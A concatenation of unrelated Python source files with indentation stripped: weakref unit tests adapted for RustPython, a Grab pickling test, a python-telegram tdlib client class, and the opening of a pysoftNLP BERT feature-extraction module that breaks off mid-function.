def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
res = []
with self.assertWarns(DeprecationWarning):
f = weakref.finalize(a, func=fin, arg=1)
self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
f()
self.assertEqual(res, [((), {'arg': 1})])
res = []
with self.assertWarns(DeprecationWarning):
f = weakref.finalize(obj=a, func=fin, arg=1)
self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
f()
self.assertEqual(res, [((), {'arg': 1})])
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
# TODO: RUSTPYTHON
# support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
grab_pickle.py | # coding: utf-8
try:
import cPickle as pickle
except ImportError:
import pickle
from multiprocessing import Queue
from test.util import BaseGrabTestCase, exclude_transport
from test.util import build_grab
class TestGrab(BaseGrabTestCase):
def setUp(self):
self.server.reset()
@exclude_transport('urllib3')
def test_pickling(self):
"""
Test that Grab instance could be pickled and unpickled.
"""
g = build_grab()
self.server.response['get.data'] =\
'<form><textarea name="text">the cat</textarea></form>'
g.go(self.server.get_url())
g.set_input('text', 'foobar')
data = pickle.dumps(g, pickle.HIGHEST_PROTOCOL)
def func(pickled_grab, resultq):
g2 = pickle.loads(pickled_grab)
text = g2.doc.select('//textarea').text()
resultq.put(text)
result_queue = Queue()
# p = Process(target=func, args=[data, result_queue])
# p.start()
func(data, result_queue)
text = result_queue.get(block=True, timeout=1)
self.assertEqual(text, 'the cat')
|
client.py | import os
import hashlib
import time
import queue
import signal
import typing
import getpass
import logging
import base64
import threading
from typing import Any, Dict, List, Type, Callable, Optional, DefaultDict, Tuple, Union
from types import FrameType
from collections import defaultdict
from python_telegram import VERSION
from python_telegram.utils import AsyncResult
from python_telegram.tdjson import TDJson
from python_telegram.worker import BaseWorker, SimpleWorker
logger = logging.getLogger(__name__)
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
class Telegram:
def __init__(
self,
api_id: int,
api_hash: str,
database_encryption_key: Union[str, bytes],
phone: Optional[str] = None,
bot_token: Optional[str] = None,
library_path: Optional[str] = None,
worker: Optional[Type[BaseWorker]] = None,
files_directory: Optional[str] = None,
use_test_dc: bool = False,
use_message_database: bool = True,
device_model: str = 'python-telegram',
application_version: str = VERSION,
system_version: str = 'unknown',
system_language_code: str = 'en',
login: bool = False,
default_workers_queue_size: int = 1000,
tdlib_verbosity: int = 2,
proxy_server: str = '',
proxy_port: int = 0,
proxy_type: Optional[Dict[str, str]] = None,
use_secret_chats: bool = True,
) -> None:
"""
Args:
api_id - ID of your app (https://my.telegram.org/apps/)
api_hash - api_hash of your app (https://my.telegram.org/apps/)
phone - your phone number
library_path - you can change path to the compiled libtdjson library
worker - worker to process updates
files_directory - directory for the tdlib's files (database, images, etc.)
use_test_dc - use test datacenter
use_message_database
use_secret_chats
device_model
application_version
system_version
system_language_code
"""
self.api_id = api_id
self.api_hash = api_hash
self.library_path = library_path
self.phone = phone
self.bot_token = bot_token
self.use_test_dc = use_test_dc
self.device_model = device_model
self.system_version = system_version
self.system_language_code = system_language_code
self.application_version = application_version
self.use_message_database = use_message_database
self._queue_put_timeout = 10
self.proxy_server = proxy_server
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.use_secret_chats = use_secret_chats
if not self.bot_token and not self.phone:
raise ValueError('You must provide bot_token or phone')
self._database_encryption_key = database_encryption_key
if not files_directory:
hasher = hashlib.md5()
str_to_encode: str = self.phone or self.bot_token # type: ignore
hasher.update(str_to_encode.encode('utf-8'))
directory_name = hasher.hexdigest()
files_directory = f'/tmp/.tdlib_files/{directory_name}/'
self.files_directory = files_directory
self._authorized = False
self._is_enabled = False
# todo: move to worker
self._workers_queue: queue.Queue = queue.Queue(
maxsize=default_workers_queue_size
)
if not worker:
worker = SimpleWorker
self.worker = worker(queue=self._workers_queue)
self._results: Dict[str, AsyncResult] = {}
self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)
self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
self._run()
if login:
self.login()
def __del__(self) -> None:
self.stop()
def stop(self) -> None:
"""Stops the client"""
self._is_enabled = False
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def send_message(self, chat_id: int, text: str) -> AsyncResult:
"""
Sends a message to a chat. The chat must be in the tdlib's database.
If there is no chat in the DB, tdlib returns an error.
Chat is being saved to the database when the client receives a message or when you call the `get_chats` method.
Args:
chat_id
text
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
...
}
"""
data = {
'@type': 'sendMessage',
'chat_id': chat_id,
'input_message_content': {
'@type': 'inputMessageText',
'text': {'@type': 'formattedText', 'text': text},
},
}
return self._send_data(data)
def get_chat(self, chat_id: int) -> AsyncResult:
"""
This is offline request, if there is no chat in your database it will not be found
tdlib saves chat to the database when it receives a new message or when you call `get_chats` method.
"""
data = {'@type': 'getChat', 'chat_id': chat_id}
return self._send_data(data)
def get_me(self) -> AsyncResult:
"""
Requests information of the current user (getMe method)
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_me.html
"""
return self.call_method('getMe')
def get_user(self, user_id: int) -> AsyncResult:
"""
Requests information about a user with id = user_id.
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_user.html
"""
return self.call_method('getUser', params={'user_id': user_id})
def get_chats(
self, offset_order: int = 0, offset_chat_id: int = 0, limit: int = 100
) -> AsyncResult:
"""
Returns a list of chats:
Returns:
{
'@type': 'chats',
'chat_ids': [...],
'@extra': {
'request_id': '...'
}
}
"""
data = {
'@type': 'getChats',
'offset_order': offset_order,
'offset_chat_id': offset_chat_id,
'limit': limit,
}
return self._send_data(data)
def get_chat_history(
self,
chat_id: int,
limit: int = 1000,
from_message_id: int = 0,
offset: int = 0,
only_local: bool = False,
) -> AsyncResult:
"""
Returns history of a chat
Args:
chat_id
limit
from_message_id
offset
only_local
"""
data = {
'@type': 'getChatHistory',
'chat_id': chat_id,
'limit': limit,
'from_message_id': from_message_id,
'offset': offset,
'only_local': only_local,
}
return self._send_data(data)
def get_message(self, chat_id: int, message_id: int,) -> AsyncResult:
"""
Return a message via its message_id
Args:
chat_id
message_id
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
'content': {...},
...
}
"""
data = {
'@type': 'getMessage',
'chat_id': chat_id,
'message_id': message_id,
}
return self._send_data(data)
def delete_messages(
self, chat_id: int, message_ids: List[int], revoke: bool = True
) -> AsyncResult:
"""
Delete a list of messages in a chat
Args:
chat_id
message_ids
revoke
"""
return self._send_data(
{
'@type': 'deleteMessages',
'chat_id': chat_id,
'message_ids': message_ids,
'revoke': revoke,
}
)
def get_supergroup_full_info(self, supergroup_id: int) -> AsyncResult:
"""
Get the full info of a supergroup
Args:
supergroup_id
"""
return self._send_data(
{'@type': 'getSupergroupFullInfo', 'supergroup_id': supergroup_id}
)
def create_basic_group_chat(self, basic_group_id: int) -> AsyncResult:
"""
Create a chat from a basic group
Args:
basic_group_id
"""
return self._send_data(
{'@type': 'createBasicGroupChat', 'basic_group_id': basic_group_id}
)
def get_web_page_instant_view(
self, url: str, force_full: bool = False
) -> AsyncResult:
"""
Use this method to request instant preview of a webpage.
Returns error with 404 if there is no preview for this webpage.
Args:
url: URL of a webpage
force_full: If true, the full instant view for the web page will be returned
"""
data = {'@type': 'getWebPageInstantView', 'url': url, 'force_full': force_full}
return self._send_data(data)
def call_method(
self,
method_name: str,
params: Optional[Dict[str, Any]] = None,
block: bool = False,
) -> AsyncResult:
"""
Use this method to call any other method of the tdlib
Args:
method_name: Name of the method
params: parameters
"""
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data, block=block)
def _run(self) -> None:
self._is_enabled = True
self._td_listener = threading.Thread(target=self._listen_to_td)
self._td_listener.daemon = True
self._td_listener.start()
self.worker.run()
def _listen_to_td(self) -> None:
logger.info('[Telegram.td_listener] started')
while self._is_enabled:
update = self._tdjson.receive()
if update:
self._update_async_result(update)
self._run_handlers(update)
def _update_async_result(
self, update: Dict[Any, Any]
) -> typing.Optional[AsyncResult]:
async_result = None
_special_types = (
'updateAuthorizationState',
) # for authorizationProcess @extra.request_id doesn't work
if update.get('@type') in _special_types:
request_id = update['@type']
else:
request_id = update.get('@extra', {}).get('request_id')
if not request_id:
logger.debug('request_id has not been found in the update')
else:
async_result = self._results.get(request_id)
if not async_result:
logger.debug(
'async_result has not been found in by request_id=%s', request_id
)
else:
done = async_result.parse_update(update)
if done:
self._results.pop(request_id, None)
return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def remove_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Remove a handler with the specified type
"""
try:
self._update_handlers[handler_type].remove(func)
except (ValueError, KeyError):
# not in the list
pass
def add_message_handler(self, func: Callable) -> None:
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(
self,
data: Dict[Any, Any],
result_id: Optional[str] = None,
block: bool = False,
) -> AsyncResult:
"""
Sends data to tdlib.
If `block`is True, waits for the result
"""
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._results[async_result.id] = async_result
self._tdjson.send(data)
async_result.request = data
if block:
async_result.wait(raise_exc=True)
return async_result
def idle(
self, stop_signals: Tuple = (signal.SIGINT, signal.SIGTERM, signal.SIGABRT)
) -> None:
"""Blocks until one of the signals are received and stops"""
for sig in stop_signals:
signal.signal(sig, self._signal_handler)
self._is_enabled = True
while self._is_enabled:
time.sleep(0.1)
def _signal_handler(self, signum: int, frame: FrameType) -> None:
self._is_enabled = False
def get_authorization_state(self) -> AsyncResult:
logger.debug('Getting authorization state')
data = {'@type': 'getAuthorizationState'}
return self._send_data(data, result_id='getAuthorizationState')
def login(self) -> None:
"""
Login process (blocking)
Must be called before any other call.
It sends initial params to the tdlib, sets database encryption key, etc.
"""
if self.proxy_server:
self._send_add_proxy()
authorization_state = None
actions = {
None: self.get_authorization_state,
'authorizationStateWaitTdlibParameters': self._set_initial_params,
'authorizationStateWaitEncryptionKey': self._send_encryption_key,
'authorizationStateWaitPhoneNumber': self._send_phone_number_or_bot_token,
'authorizationStateWaitCode': self._send_telegram_code,
'authorizationStateWaitPassword': self._send_password,
'authorizationStateReady': self._complete_authorization,
}
if self.phone:
logger.info('[login] Login process has been started with phone')
else:
logger.info('[login] Login process has been started with bot token')
while not self._authorized:
logger.info('[login] current authorization state: %s', authorization_state)
result = actions[authorization_state]()
if result:
result.wait(raise_exc=True)
if result.update is None:
raise RuntimeError('Something wrong, the result update is None')
if result.id == 'getAuthorizationState':
authorization_state = result.update['@type']
else:
authorization_state = result.update['authorization_state']['@type']
def _set_initial_params(self) -> AsyncResult:
logger.info(
'Setting tdlib initial params: files_dir=%s, test_dc=%s',
self.files_directory,
self.use_test_dc,
)
data = {
# todo: params
'@type': 'setTdlibParameters',
'parameters': {
'use_test_dc': self.use_test_dc,
'api_id': self.api_id,
'api_hash': self.api_hash,
'device_model': self.device_model,
'system_version': self.system_version,
'application_version': self.application_version,
'system_language_code': self.system_language_code,
'database_directory': os.path.join(self.files_directory, 'database'),
'use_message_database': self.use_message_database,
'files_directory': os.path.join(self.files_directory, 'files'),
'use_secret_chats': self.use_secret_chats,
},
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
key = self._database_encryption_key
if isinstance(key, str):
key = key.encode()
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': base64.b64encode(key).decode(),
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_add_proxy(self) -> AsyncResult:
logger.info('Sending addProxy')
data = {
'@type': 'addProxy',
'server': self.proxy_server,
'port': self.proxy_port,
'enable': True,
'type': self.proxy_type,
}
return self._send_data(data, result_id='setProxy')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_telegram_code(self) -> AsyncResult:
logger.info('Sending code')
code = input('Enter code:')
data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_password(self) -> AsyncResult:
logger.info('Sending password')
password = getpass.getpass('Password:')
data = {'@type': 'checkAuthenticationPassword', 'password': password}
return self._send_data(data, result_id='updateAuthorizationState')
def _complete_authorization(self) -> None:
logger.info('Completing auth process')
self._authorized = True
|
extract_feature.py | from pysoftNLP.bert.graph import import_tf
from pysoftNLP.bert import modeling
from pysoftNLP.bert import tokenization
from pysoftNLP.bert.graph import optimize_graph
from pysoftNLP.bert import args
from queue import Queue
from threading import Thread
tf = import_tf(0, True)
class InputExample(object):
def __init__(self, unique_id, text_a, text_b):
self.unique_id = unique_id
self.text_a = text_a
self.text_b = text_b
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids):
self.unique_id = unique_id
self.tokens = tokens
self.input_ids = input_ids
self.input_mask = input_mask
self.input_type_ids = input_type_ids
class BertVector:
def __init__(self, batch_size=32, pooling_strategy="REDUCE_MEAN", max_seq_len=40):
"""
init BertVector
:param batch_size: Depending on your memory default is 32
"""
self.max_seq_length = max_seq_len
self.layer_indexes = args.layer_indexes
self.gpu_memory_fraction = 1
if pooling_strategy == "NONE":
pooling_strategy = args.PoolingStrategy.NONE
elif pooling_strategy == "REDUCE_MAX":
pooling_strategy = args.PoolingStrategy.REDUCE_MAX
elif pooling_strategy == "REDUCE_MEAN":
pooling_strategy = args.PoolingStrategy.REDUCE_MEAN
elif pooling_strategy == "REDUCE_MEAN_MAX":
pooling_strategy = args.PoolingStrategy.REDUCE_MEAN_MAX
self.graph_path = optimize_graph(pooling_strategy=pooling_strategy, max_seq_len=self.max_seq_length)
self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)
self.batch_size = batch_size
self.estimator = self.get_estimator()
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
self.predict_thread = Thread(target=self.predict_from_queue, daemon=True)
self.predict_thread.start()
def get_estimator(self):
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.estimator.model_fn import EstimatorSpec
def model_fn(features, labels, mode, params):
with tf.gfile.GFile(self.graph_path, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
input_names = ['input_ids', 'input_mask', 'input_type_ids']
output = tf.import_graph_def(graph_def,
input_map={k + ':0': features[k] for k in input_names},
return_elements=['final_encodes:0'])
return EstimatorSpec(mode=mode, predictions={
'encodes': output[0]
})
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = self.gpu_memory_fraction
config.log_device_placement = False
config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
return Estimator(model_fn=model_fn, config=RunConfig(session_config=config),
params={'batch_size': self.batch_size})
def predict_from_queue(self):
prediction = self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False)
for i in prediction:
self.output_queue.put(i)
def encode(self, sentence):
self.input_queue.put(sentence)
prediction = self.output_queue.get()
return prediction
def queue_predict_input_fn(self):
return (tf.data.Dataset.from_generator(
self.generate_from_queue,
output_types={'unique_ids': tf.int32,
'input_ids': tf.int32,
'input_mask': tf.int32,
'input_type_ids': tf.int32},
output_shapes={
'unique_ids': (1,),
'input_ids': (None, self.max_seq_length),
'input_mask': (None, self.max_seq_length),
'input_type_ids': (None, self.max_seq_length)}))
def generate_from_queue(self):
while True:
features = list(self.convert_examples_to_features(seq_length=self.max_seq_length, tokenizer=self.tokenizer))
yield {
'unique_ids': [f.unique_id for f in features],
'input_ids': [f.input_ids for f in features],
'input_mask': [f.input_mask for f in features],
'input_type_ids': [f.input_type_ids for f in features]
}
def input_fn_builder(self, features, seq_length):
"""Creates an `input_fn` closure to be passed to Estimator."""
all_unique_ids = []
all_input_ids = []
all_input_mask = []
all_input_type_ids = []
for feature in features:
